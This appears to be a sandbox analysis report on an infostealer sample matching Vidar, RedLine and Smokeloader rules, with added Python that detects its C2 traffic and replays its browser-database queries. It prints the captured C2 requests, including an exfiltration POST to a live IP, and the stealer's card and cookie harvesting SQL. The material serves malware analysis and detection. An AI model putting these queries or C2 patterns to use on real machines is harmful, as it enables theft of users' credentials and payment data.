Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/firefox/115.0.3/whatsnew/?oldversion=98.0.2
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/en-US/firefox/115.0.3/whatsnew/?oldversion=98.0.2What
Source: file.exe, 00000001.00000002.3729994076.000000001157C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/firefox/download/thanks/
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.mozilla.org/en-US/firefox/download/thanks/https://www.mozilla.org/en-GB/firefox/new/
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/115.0.3/whatsnew/?oldversion=98.0.2
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/firefox/115.0.3/whatsnew/?oldversion=98.0.2gro.allizom.www.
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/central/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/firefox/central/gro.allizom.www.
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/media/protocol/img/logos/firefox/browser/og.4ad05d4125a5.png
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----4389493767942367
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13
    Host: 195.201.254.123:6012
    Content-Length: 126637
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: t.me
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040E600 DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_0040E600
Source: global traffic HTTP traffic detected:
    GET /vogogor HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
    Host: t.me
Source: global traffic HTTP traffic detected:
    GET /b2ced91faf30889899f34458f95b8e93 HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13
    Host: 195.201.254.123:6012
Source: global traffic HTTP traffic detected:
    GET /sp1.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13
    Host: 195.201.254.123:6012
    Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49773 version: TLS 1.2
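The captured requests above show the order this sample works in: a GET to a dead-drop resolver (t.me/vogogor on the wire; the steamcommunity.com profile URL in memory is the alternative), then a GET for a 32-hex-character path on 195.201.254.123:6012, a GET for sp1.zip from the same host, and a multipart POST back to it, while the User-Agent switches from a Windows Firefox string to a macOS Safari string. The Python below is an added example, not part of the sandbox report or of any vendor signature: the four requests are rebuilt from the lines above as constructed input, and the indicator names and the port/host heuristics are assumptions chosen for this illustration.

```python
"""Flag the dead-drop-resolver -> config -> archive -> multipart-POST sequence.

Added example; the requests are CONSTRUCTED from the sandbox report's traffic
lines and the heuristics below are the editor's own, not a vendor rule.
"""
import re
from typing import Dict, List, Tuple

FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0"
SAFARI_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 "
             "(KHTML, like Gecko) Version/16.5.2 Safari/605.2.13")
C2 = "195.201.254.123:6012"   # host:port taken from the report

# Constructed raw requests (CRLF-separated), rebuilt from the report's four requests.
SAMPLE_REQUESTS = [
    f"GET /vogogor HTTP/1.1\r\nUser-Agent: {FIREFOX_UA}\r\nHost: t.me\r\n\r\n",
    f"GET /b2ced91faf30889899f34458f95b8e93 HTTP/1.1\r\nUser-Agent: {SAFARI_UA}\r\nHost: {C2}\r\n\r\n",
    f"GET /sp1.zip HTTP/1.1\r\nUser-Agent: {SAFARI_UA}\r\nHost: {C2}\r\nCache-Control: no-cache\r\n\r\n",
    (f"POST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----4389493767942367\r\n"
     f"User-Agent: {SAFARI_UA}\r\nHost: {C2}\r\nContent-Length: 126637\r\n"
     "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"),
]

# Assumed: public services this family uses to publish its real C2 address.
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HEX32_RE = re.compile(r"^/[0-9a-f]{32}$")


def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP/1.x request into method, path and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    req = {"method": method, "path": path}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            req[name.strip().lower()] = value.strip()
    return req


def split_host(host: str) -> Tuple[str, int]:
    """Return (hostname, port); the traffic here is plain HTTP, so default to 80."""
    if ":" in host:
        name, port = host.rsplit(":", 1)
        return name, int(port)
    return host, 80


def classify(raw_requests: List[str]) -> List[str]:
    """Return matched indicators in order of first occurrence."""
    indicators: List[str] = []
    user_agents = set()
    seen_c2 = set()
    for raw in raw_requests:
        req = parse_request(raw)
        host, port = split_host(req.get("host", ""))
        user_agents.add(req.get("user-agent", ""))
        if req["method"] == "GET" and host in DEAD_DROP_HOSTS:
            indicators.append(f"dead-drop resolver lookup: {host}{req['path']}")
            continue
        if not IPV4_RE.match(host):
            continue                      # named hosts are out of scope here
        key = f"{host}:{port}"
        if port not in (80, 443) and key not in seen_c2:
            seen_c2.add(key)
            indicators.append(f"plain HTTP to bare IP on non-standard port {key}")
        if req["method"] == "GET" and HEX32_RE.match(req["path"]):
            indicators.append(f"32-hex config fetch {req['path']}")
        elif req["method"] == "GET" and req["path"].lower().endswith(".zip"):
            indicators.append(f"archive download {req['path']}")
        elif (req["method"] == "POST"
              and req.get("content-type", "").startswith("multipart/form-data")):
            indicators.append(f"multipart POST to {key} (exfiltration)")
    if len(user_agents) > 1:
        indicators.append("inconsistent User-Agent across requests")
    return indicators


if __name__ == "__main__":
    for hit in classify(SAMPLE_REQUESTS):
        print(hit)
```

Feed `classify` the raw requests from a proxy or PCAP export instead of `SAMPLE_REQUESTS` to run the same checks on live traffic; the User-Agent comparison is only meaningful when the requests come from one process, as they do in the sandbox trace.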

System Summary

Source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.3698810477.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.3698810477.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004294F0 1_2_004294F0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00408740 1_2_00408740
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00427090 1_2_00427090
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004270B8 1_2_004270B8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043C33D 1_2_0043C33D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00438380 1_2_00438380
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043E4FF 1_2_0043E4FF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043D4BB 1_2_0043D4BB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B541 1_2_0044B541
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B55C 1_2_0044B55C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B56C 1_2_0044B56C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B568 1_2_0044B568
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B5E8 1_2_0044B5E8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B668 1_2_0044B668
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B674 1_2_0044B674
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B614 1_2_0044B614
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B620 1_2_0044B620
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B62C 1_2_0044B62C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004066C8 1_2_004066C8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004066A0 1_2_004066A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B6B0 1_2_0044B6B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B6BC 1_2_0044B6BC
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00438768 1_2_00438768
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043777B 1_2_0043777B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00427730 1_2_00427730
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004087BE 1_2_004087BE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043C88E 1_2_0043C88E
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00401090 appears 131 times
Source: file.exe, 00000001.00000000.1220167638.000000000243D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamepetting.exe> vs file.exe
Source: file.exe, 00000001.00000003.1501124219.0000000010A11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs file.exe
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamepetting.exe> vs file.exe
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/22@1/2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041F770 CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysFreeString, 1_2_0041F770
Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsz;y
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies};x
Source: file.exe, 00000001.00000002.3696575131.000000000259D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies{;y
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 41854390081158473842695081.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
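The three SELECT strings in the sample's own memory (credit_cards, cookies, moz_cookies) are the queries it runs against Chromium's Web Data and Cookies files and Firefox's cookies.sqlite; the remaining SQL above belongs to the dropped NSS libraries. One detail worth checking: the Chromium expiry arithmetic subtracts 11644480800, which is 7200 s more than the 11644473600 s between the 1601-01-01 epoch Chromium uses (microseconds) and the Unix epoch, so every cookie expiry this stealer reports is two hours early. The Python below is an added example, not from the report or from the malware: it builds constructed, minimal in-memory copies of those tables with only the columns the queries touch, runs the report's query strings against them, and measures that skew. The row values, the dummy "v10"-prefixed blobs and the reduced table layouts are assumptions for illustration; real Chromium values would still need DPAPI/AES-GCM decryption, which is out of scope here.

```python
"""Replay the browser-database queries recovered from the sample's memory.

Added example. The tables below are CONSTRUCTED, reduced to the columns the
recovered queries reference; values are made up for illustration only.
"""
import sqlite3
from typing import List, Tuple

WEBKIT_EPOCH_OFFSET = 11_644_473_600   # seconds from 1601-01-01 to 1970-01-01 (UTC)
SAMPLE_OFFSET = 11_644_480_800         # constant hard-coded in the sample's query

# Query strings as found in memory (trailing junk bytes removed).
CHROMIUM_COOKIES_SQL = ("SELECT HOST_KEY, is_httponly, path, is_secure, "
                        "(expires_utc/1000000)-11644480800, name, encrypted_value from cookies")
CHROMIUM_CARDS_SQL = ("SELECT name_on_card, expiration_month, expiration_year, "
                      "card_number_encrypted FROM credit_cards")
FIREFOX_COOKIES_SQL = ("SELECT host, isHttpOnly, path, isSecure, expiry, name, value "
                       "FROM moz_cookies")

UNIX_2024 = 1_704_067_200   # 2024-01-01T00:00:00Z, used as the constructed expiry


def webkit_to_unix(expires_utc: int) -> int:
    """Chromium stores cookie expiry as microseconds since 1601-01-01 UTC."""
    return expires_utc // 1_000_000 - WEBKIT_EPOCH_OFFSET


def build_chromium_db() -> sqlite3.Connection:
    """Constructed stand-in for Chromium's Cookies and Web Data tables (one DB)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE cookies (host_key TEXT, name TEXT, encrypted_value BLOB,
            path TEXT, expires_utc INTEGER, is_secure INTEGER, is_httponly INTEGER);
        CREATE TABLE credit_cards (name_on_card TEXT, expiration_month INTEGER,
            expiration_year INTEGER, card_number_encrypted BLOB);
    """)
    expires = (UNIX_2024 + WEBKIT_EPOCH_OFFSET) * 1_000_000
    # Real Chromium blobs start with "v10" and are AES-GCM under a DPAPI-wrapped key;
    # the payloads here are dummies.
    db.execute("INSERT INTO cookies VALUES (?,?,?,?,?,?,?)",
               (".example.test", "session", b"v10\x00dummy", "/", expires, 1, 1))
    db.execute("INSERT INTO credit_cards VALUES (?,?,?,?)",
               ("J Doe", 12, 2027, b"v10\x00dummy-card"))
    return db


def build_firefox_db() -> sqlite3.Connection:
    """Constructed stand-in for Firefox cookies.sqlite (values are plaintext there)."""
    db = sqlite3.connect(":memory:")
    db.execute("""CREATE TABLE moz_cookies (host TEXT, isHttpOnly INTEGER, path TEXT,
        isSecure INTEGER, expiry INTEGER, name TEXT, value TEXT)""")
    db.execute("INSERT INTO moz_cookies VALUES (?,?,?,?,?,?,?)",
               (".example.test", 1, "/", 1, UNIX_2024, "session", "plaintext-token"))
    return db


def harvest(db: sqlite3.Connection, sql: str) -> List[Tuple]:
    """Run one of the recovered queries exactly as the sample would."""
    return db.execute(sql).fetchall()


def expiry_skew_seconds() -> int:
    """Difference between the true Unix expiry and what the sample's SQL yields."""
    db = build_chromium_db()
    (sample_value,) = db.execute(
        "SELECT (expires_utc/1000000)-11644480800 FROM cookies").fetchone()
    (raw,) = db.execute("SELECT expires_utc FROM cookies").fetchone()
    return webkit_to_unix(raw) - sample_value


if __name__ == "__main__":
    cdb, fdb = build_chromium_db(), build_firefox_db()
    print(harvest(cdb, CHROMIUM_COOKIES_SQL))
    print(harvest(cdb, CHROMIUM_CARDS_SQL))
    print(harvest(fdb, FIREFOX_COOKIES_SQL))
    print("expiry skew (s):", expiry_skew_seconds())
```

The same query strings run unchanged against a real profile copy because SQLite column names are case-insensitive (HOST_KEY matches host_key), which is also why this reduced schema is enough to exercise them; the fixed 7200 s skew is a small but stable artifact of this build that an analyst can recognise in exfiltrated cookie dumps.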
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041F820 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle, 1_2_0041F820
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
